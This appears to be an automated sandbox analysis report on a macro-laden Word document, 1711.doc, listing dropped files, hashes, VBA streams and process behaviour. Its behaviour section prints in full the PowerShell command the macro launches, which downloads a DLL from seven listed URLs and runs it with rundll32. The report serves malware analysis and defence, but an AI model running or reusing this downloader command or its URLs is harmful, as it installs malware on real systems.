    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):41984
    Entropy (8bit):5.383636719226494
    Encrypted:false
    SSDEEP:768:In/plLQxx12HtK6z0D4J/pFLQxx12HtK6z0D:KlLQxx12HtK6z0UFLQxx12HtK6z0
    MD5:630161A7185DCB458C3A526CCD969ABB
    SHA1:9A9AFEAE4A07A818F707C584B29323335F508FCD
    SHA-256:4D9F1733C0B90882E54B3A36271659D8F3DA895A9A6E26FD130DA1F14A91964D
    SHA-512:92099AAF7E64C63C2A4678669F0367B10D0D474E8F710D22D0428D501D5C3FA3578D9602633E3235E0E1CD9A631B7EFDE12898EA5937176006C70723A37A7B44
    Malicious:false
    Reputation:low
    Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(...*...........................................................................................................................................)...+...6...O...........................................,...................................................................................................P...........................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{31697AE2-9911-46AE-855C-FC6F84C9E570}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.6413622548786062
    Encrypted:false
    SSDEEP:6:rlEPgsn1F1YsuTyavlEtSYd9XwY2sQmh5epe8P+7WAeSTBFXZSuIehx:ePLF10yWEtSYW9oH8JAeOBBZSmX
    MD5:91473136D20E3046BECA18C78CE9BBE7
    SHA1:014B29FADC9F1EB72ADEBAB7A157BF9789953462
    SHA-256:7A57B63B9EB2FA46EC6C49F9D792DE64710966EA99730E6B18702F49D988A15F
    SHA-512:4ABA8620775E931315BAE02D9F3C72188413831342C1BC67EC1F5C0FD37D0F662ABD04EBED5D3613CB8BAC159B87457BB87FCF4E6992262ABE4981B95EAAE5A0
    Malicious:false
    Reputation:low
    Preview: ../........... . . ... ... ..... . ..... . ... ......... . . ......... ........... . . ....... ... ... . ...........................................................................................................................................................................................................................................................................................................................................................................................................................................6...8...B...D...F...J...L...l...n...p...r...t...v...x...z...|.......................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{52852A70-A935-4D7F-A270-7FCD1CA48619}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A4608109-7EE5-416E-A16B-050D4F8625B8}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):2
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:X:X
    MD5:32649384730B2D61C9E79D46DE589115
    SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
    SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
    SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
    Malicious:false
    Reputation:high, very likely benign file
    Preview: ..
    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):147284
    Entropy (8bit):4.421624942731045
    Encrypted:false
    SSDEEP:1536:C8yL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CZJNSc83tKBAvQVCgOtmXmLpLmB
    MD5:62946DD1D4369B40AB7C43FFE49306F1
    SHA1:D820412F0CEFF346B60691EC53B0CFEC545240A0
    SHA-256:574017A6CD6121E24117AA16750044E473BEAB038466C6FC53FF50B7222BD78D
    SHA-512:E9C30A2DAB18805A3DD2A4C7AB8B175DB85713430A3BC1EF148D492A43154F1A3F033D40E4CEEAA2E9B81A0E3C24E4BF5C9FC63E9C9DBC46ADDF45A3AEB11F6C
    Malicious:false
    Reputation:low
    Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................
    C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):55808
    Entropy (8bit):4.7353560135116135
    Encrypted:false
    SSDEEP:1536:z7ohjy3K6eGum/Cnps39t0UtXJTpzmFlZD:whjya6eGum/Cny1JTpz0H
    MD5:44F9CCBE595FE1B7BFD3E2A1140C56A0
    SHA1:C49C1A9814569DC6E95F87157A16D243DEA160A3
    SHA-256:318F746A4626DF1CE5F62D174620751B0418E7FFA7F847FFBBADB5433D096EE0
    SHA-512:24892FC86719306BBA3ABBE52DF64B77AD32ECD94DEC55A75AD54CD80C80A61E4C4C703135C7F7B83D16B58E820BC2ABC207BFE198F3506B744BEAAD39DE287B
    Malicious:false
    Yara Hits:
    • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP, Author: Florian Roth
    Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................G....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5.......7...8...9...:...;...D...=...>...?...@...A...B...C...6...E...F.......i...I...J...O...L...M...N.......P...j...R...S...T...U...V...W...X...K...Z...[...\...]...^...g...`...a...b...c...d...e...f...Y...h...........k...............................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1711.LNK
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Mon Nov 22 17:54:15 2021, length=135948, window=hide
    Category:dropped
    Size (bytes):980
    Entropy (8bit):4.477890004940672
    Encrypted:false
    SSDEEP:12:8iW1gXg/XAlCPCHaXeBhB/OW9qX+WfY0tcPgicvb6MZUnDtZ3YilMMEpxRljKico:8ia/XTuzLI5YDeGMZ0Dv3qoQd7Qy
    MD5:1B2D29FE46309EB73F25961FA46345B9
    SHA1:38C4DD45673A3E5091D0BBE04F980A6A3089FBA9
    SHA-256:C583E5FF8FFC2C220BCC2F3F794EE2274B67E82F26165F28F6A152BDE458E72C
    SHA-512:E51CA5E2D222DF2F28DA05F78E3166846332AF27DF8E4AF314CCD35569B5311DC5D1910B522BDA82AF67422ACBC78C5B782F5BFD87BFE7626A922A78AD3312CF
    Malicious:false
    Preview: L..................F.... ...gu.?...gu.?....?.X.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2.....vS. .1711.doc..>.......S...S..*.........................1.7.1.1...d.o.c.......r...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\1711.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.7.1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):59
    Entropy (8bit):4.424791041423791
    Encrypted:false
    SSDEEP:3:bDuMJlYUdruYCmX1USXruYCv:bCs2Ms
    MD5:38B1B69A7D2D3E1C386BC4E37CB0A52B
    SHA1:F761BA2E5930369A2AE6B055664B1E06E53E3646
    SHA-256:EE6611A14ABADA654761586768A652637235A616AF1030FD8BC52EA555FFF18C
    SHA-512:CA698A65875D0DBAFBA21E6384ED97672BCFDBA0C20BA92EFF147139B938412D393C14A6F46C6BE13AC2F4DD0314F57C7BDF7DF76544D4269207234AA3874FFF
    Malicious:false
    Preview: [folders]..Templates.LNK=0..1711.LNK=0..[doc]..1711.LNK=0..
    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.5038355507075254
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
    Malicious:false
    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2ZU8F0KC83087BZI92TF.temp
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):8016
    Entropy (8bit):3.5819683626894125
    Encrypted:false
    SSDEEP:96:chQCQMqKqvsqvJCwo6z8hQCQMqKqvsEHyqvJCworIzdTYnHBF2MGlUVkA2:cWzo6z8WnHnorIzdsF2MSA2
    MD5:9F246B20B682C6FDB9E7E0679D09DE37
    SHA1:CFB8A7BF38F60314C5D1A5135F0C9B024435F4A9
    SHA-256:1D828DE626EBBA11C829D965E10058C8DC839AA14EE991786034ED340B7DCDD6
    SHA-512:0BA10B567653CAA3C5E438290B9D97FC9FBE20EFDC8D679891C4798DD00E24BB9D83119423F8FF0C8C169BD352F6A7A67A450989ED5706E5051B2EFBEEFB9FF1
    Malicious:false
    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msa (copy)
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):8016
    Entropy (8bit):3.5819683626894125
    Encrypted:false
    SSDEEP:96:chQCQMqKqvsqvJCwo6z8hQCQMqKqvsEHyqvJCworIzdTYnHBF2MGlUVkA2:cWzo6z8WnHnorIzdsF2MSA2
    MD5:9F246B20B682C6FDB9E7E0679D09DE37
    SHA1:CFB8A7BF38F60314C5D1A5135F0C9B024435F4A9
    SHA-256:1D828DE626EBBA11C829D965E10058C8DC839AA14EE991786034ED340B7DCDD6
    SHA-512:0BA10B567653CAA3C5E438290B9D97FC9FBE20EFDC8D679891C4798DD00E24BB9D83119423F8FF0C8C169BD352F6A7A67A450989ED5706E5051B2EFBEEFB9FF1
    Malicious:false
    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
    C:\Users\user\Desktop\~$1711.doc
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.5038355507075254
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
    Malicious:true
    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

    Static File Info

    General

    File type:Microsoft Word 2007+
    Entropy (8bit):7.953932715889731
    TrID:
    • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
    • Word Microsoft Office Open XML Format document (49504/1) 32.35%
    • Word Microsoft Office Open XML Format document (43504/1) 28.43%
    • ZIP compressed archive (8000/1) 5.23%
    File name:1711.doc
    File size:145337
    MD5:85ab297345c97bca1a5004dc537f6c1c
    SHA1:0b609d0b86f1b29410451306c173c7fac013d5a7
    SHA256:31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
    SHA512:c5f246b510db5ba25b29338a5fc1182ac56738be51ebc6c8f5fb0e004a5b42e61fe69a304efcd5e000382609f1f524f329bd41322b5e5f67a986deea40cd4ec6
    SSDEEP:3072:hwQhXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDK3CXV:yeXw50+OukzVXV2uhDCxXV
    File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:e4eea2aaa4b4b4a4

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "/opt/package/joesandbox/database/analysis/526179/sample/1711.doc"

    Indicators

    Has Summary Info:False
    Application Name:unknown
    Encrypted Document:False
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Author:1
    Template:Normal.dotm
    Last Saved By:1
    Revion Number:39
    Total Edit Time:144
    Create Time:2021-11-15T15:39:00Z
    Last Saved Time:2021-11-16T19:13:00Z
    Number of Pages:1
    Number of Words:9
    Number of Characters:53
    Creating Application:Microsoft Office Word
    Security:0

    Document Summary

    Number of Lines:1
    Number of Paragraphs:1
    Thumbnail Scaling Desired:false
    Company:
    Contains Dirty Links:false
    Shared Document:false
    Changed Hyperlinks:false
    Application Version:12.0000

    Streams with VBA

    VBA File Name: bvkaeiku2ncoi2uho3ihdes.cls, Stream Size: 9859
    General
    Stream Path:VBA/bvkaeiku2ncoi2uho3ihdes
    VBA File Name:bvkaeiku2ncoi2uho3ihdes.cls
    Stream Size:9859
    Data ASCII:. . . . . . . . . ^ . . . . . . . . . . . . . . . j . . . b . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 01 00 01 f0 00 00 00 5e 07 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff 6a 07 00 00 62 19 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code

    Streams

    Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521
    General
    Stream Path:PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:521
    Entropy:5.22231541281
    Base64 Encoded:True
    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = b v k a e i k u 2 n c o i 2 u h o 3 i h d e s / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 F 5 D F 3 5 6 0 D E A 6 8 E E 6 8 E E 6 C F 2 6 C F 2 " . . D
    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 62 76 6b 61 65 69 6b 75 32 6e 63 6f 69 32 75 68 6f 33 69 68 64 65 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30
    Stream Path: PROJECTwm, File Type: data, Stream Size: 74
    General
    Stream Path:PROJECTwm
    File Type:data
    Stream Size:74
    Entropy:3.31599778695
    Base64 Encoded:False
    Data ASCII:b v k a e i k u 2 n c o i 2 u h o 3 i h d e s . b . v . k . a . e . i . k . u . 2 . n . c . o . i . 2 . u . h . o . 3 . i . h . d . e . s . . . . .
    Data Raw:62 76 6b 61 65 69 6b 75 32 6e 63 6f 69 32 75 68 6f 33 69 68 64 65 73 00 62 00 76 00 6b 00 61 00 65 00 69 00 6b 00 75 00 32 00 6e 00 63 00 6f 00 69 00 32 00 75 00 68 00 6f 00 33 00 69 00 68 00 64 00 65 00 73 00 00 00 00 00
    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4778
    General
    Stream Path:VBA/_VBA_PROJECT
    File Type:data
    Stream Size:4778
    Entropy:4.85191198027
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
    Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
    Stream Path: VBA/dir, File Type: data, Stream Size: 841
    General
    Stream Path:VBA/dir
    File Type:data
    Stream Size:841
    Entropy:6.48895457492
    Base64 Encoded:True
    Data ASCII:. E . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . o . . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
    Data Raw:01 45 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 6f c3 8b 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    Behavior

    Click to jump to process

    System Behavior

    Analysis Process: WINWORD.EXE PID: 2640 Parent PID: 596

    General

    Start time:10:54:15
    Start date:22/11/2021
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13fad0000
    File size:1423704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Analysis Process: cmd.exe PID: 2632 Parent PID: 2640

    General

    Start time:10:54:20
    Start date:22/11/2021
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Imagebase:0x4ab10000
    File size:345088 bytes
    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Analysis Process: powershell.exe PID: 2840 Parent PID: 2632

    General

    Start time:10:54:21
    Start date:22/11/2021
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Imagebase:0x13f580000
    File size:473600 bytes
    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >